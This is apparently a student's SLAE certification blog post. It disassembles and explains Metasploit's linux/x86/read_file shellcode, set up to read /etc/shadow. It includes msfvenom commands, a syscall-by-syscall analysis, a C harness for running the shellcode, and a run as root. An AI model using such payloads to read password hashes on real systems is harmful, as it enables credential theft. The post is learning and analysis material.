SLAE #5: linux/x86/read_file

In this blog post we’re going to analyze the linux/x86/read_file payload from Metasploit.

There are two required options. The first one is the file descriptor to write the output to, which defaults to the standard output. The second one is the path to the file we want to read.

$ msfvenom -p linux/x86/read_file --payload-options
Options for payload/linux/x86/read_file

       Name: Linux Read File
     Module: payload/linux/x86/read_file
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 184
       Rank: Normal

Provided by:

Basic options:
Name  Current Setting  Required  Description
——  ———————  ————  —————
FD    1                yes       The file descriptor to write output to
PATH                   yes       The file path to read

  Read up to 4096 bytes from the local file system and write it back 
  out to the specified file descriptor

Let’s set the path to /etc/shadow and use ndisasm to get the disassembled output.

$ msfvenom -p linux/x86/read_file PATH=/etc/shadow | ndisasm -u -
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload

00000000  EB36              jmp short 0x38
00000002  B805000000        mov eax,0x5
00000007  5B                pop ebx
00000008  31C9              xor ecx,ecx
0000000A  CD80              int 0x80
0000000C  89C3              mov ebx,eax
0000000E  B803000000        mov eax,0x3
00000013  89E7              mov edi,esp
00000015  89F9              mov ecx,edi
00000017  BA00100000        mov edx,0x1000
0000001C  CD80              int 0x80
0000001E  89C2              mov edx,eax
00000020  B804000000        mov eax,0x4
00000025  BB01000000        mov ebx,0x1
0000002A  CD80              int 0x80
0000002C  B801000000        mov eax,0x1
00000031  BB00000000        mov ebx,0x0
00000036  CD80              int 0x80
00000038  E8C5FFFFFF        call dword 0x2
0000003D  2F                das
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7368              jnc 0xac
00000044  61                popad
00000045  646F              fs outsd
00000047  7700              ja 0x49

The first instruction jumps to offset 0x38, which in turn is a call instruction to offset 0x2. It looks like the JMP-CALL-POP technique is taking place. This means that the instructions starting from offset 0x3D might in fact be the path string being misinterpreted by ndisasm.

There are four system calls being executed from the disassembly offset 0x2 to the call instruction at offset 0x38. Let’s analyze each one and see what they are doing.

mov eax,0x5
pop ebx
xor ecx,ecx
int 0x80

eax contains the system call identifier. It is being set to 5, so it corresponds to the open syscall.

$ grep 5 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_open 5

The relevant manpage contains the function’s signature.

int open(const char *pathname, int flags);

The second instruction is taking the last value on the stack and storing it in the ebx register. Since the program is using the JMP-CALL-POP technique and ebx refers to the char *pathname parameter, we can conclude that everything starting from offset 0x3D is the file path string. We’ll analyze the hex values later in the post.

Finally, ecx is zeroed out, which corresponds to the flags parameter being set to O_RDONLY as shown in the fcntl.h header file.

$ grep O_RDONLY /usr/include/asm-generic/fcntl.h 
#define O_RDONLY    00000000

If the call to open is successful, the file descriptor will be stored in the eax register.

Moving on to the next block of code.

mov ebx,eax
mov eax,0x3
mov edi,esp
mov ecx,edi
mov edx,0x1000
int 0x80

The first instruction saves the file descriptor to ebx. Afterwards, eax is set to 3, which allows us to identify the read system call.

$ grep 3 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_read 3

man 2 read describes the function signature.

ssize_t read(int fd, void *buf, size_t count);

ecx points to the top of the stack, where the read operation will attempt to store the bytes read.

The edx register corresponds to the size_t count parameter. It is set to 0x1000, which means it will attempt to read up to 4096 bytes.

Finally, the int 0x80 instruction takes place, making the call to read.

mov edx,eax
mov eax,0x4
mov ebx,0x1
int 0x80

The first instruction of this block stores the returned value from the read operation into the edx register. Keep in mind that read returns the number of bytes read on success.

The syscall identifier in this case is 4.

$ grep 4 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_write 4

Again, looking at the manpage for write we can get its signature.

ssize_t write(int fd, const void *buf, size_t count);

ebx is set to STDOUT (fd=1) as expected.

The value in ecx has not been modified since the call to read, so it still points to the buffer stored in the stack. In addition, edx contains the number of bytes to write.

The final call to int 0x80 executes the syscall.

mov eax,0x1
mov ebx,0x0
int 0x80

The last part of the program before the call instruction does a clean exit.

$ grep 1 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define _ASM_X86_UNISTD_32_H 1
#define __NR_exit 1

To confirm that all the gibberish after the call instruction is the file path, we can get the hexadecimal values and interpret them as ASCII values.

>>> "2F6574632F736861646F7700".decode("hex")

It seems we were right! It’s just the nul-terminated file path which ndisasm misinterpreted as code.

Let’s actually execute the payload and see if its behavior matches with the analysis. We can use msfvenom to encode the shellcode in order to get rid of bad characters (\x00 in this case).

$ msfvenom -p linux/x86/read_file PATH=/etc/shadow -f c -b ‘\x00’
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 22 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 100 (iteration=0)
unsigned char buf[] = 

Insert the encoded shellcode in our shellcode tester file.

#include <stdio.h>
#include <string.h>

unsigned char code[] =

int main() {
    printf("Shellcode Length:  %d\n", strlen(code));
    int (*ret)() = (int(*)())code;

Compile it.

$ gcc -o shellcode shellcode.c -z execstack

And run it.

$ ./shellcode 
Shellcode Length:  100

Hmmm there’s no output. Why is that? Because the file we are trying to read cannot be accessed by regular users, since it contains all the user password hashes.

$ ls -l /etc/shadow
-rw-r—— 1 root shadow 1062 Mar  4 16:57 /etc/shadow

Running the shellcode as root produces the desired results.

$ sudo ./shellcode 
Shellcode Length:  100

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-­651


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s